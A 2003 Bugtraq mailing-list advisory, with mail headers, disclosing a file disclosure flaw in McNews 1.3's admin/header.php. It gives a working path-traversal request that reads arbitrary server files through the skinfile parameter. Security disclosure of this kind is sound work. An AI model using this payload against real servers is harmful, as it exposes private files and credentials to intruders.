[31839] in bugtraq
McNews 1.3 : File Disclosure Vulnerability
daemon@ATHENA.MIT.EDU (Sebastien Lelarge)
Fri Sep 26 14:45:44 2003
Date: 26 Sep 2003 08:40:05 -0000
Message-ID: <20030926084005.3242.qmail@sf-www1-symnsj.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
From: Sebastien Lelarge <sebastien.lelarge@tremplin-utc.net>
To: bugtraq@securityfocus.com
The vulnerable script is <mcnews_root>/admin/header.php
Exploit it with : header.php?voir=1&skinfile=skin/../../../file/to/view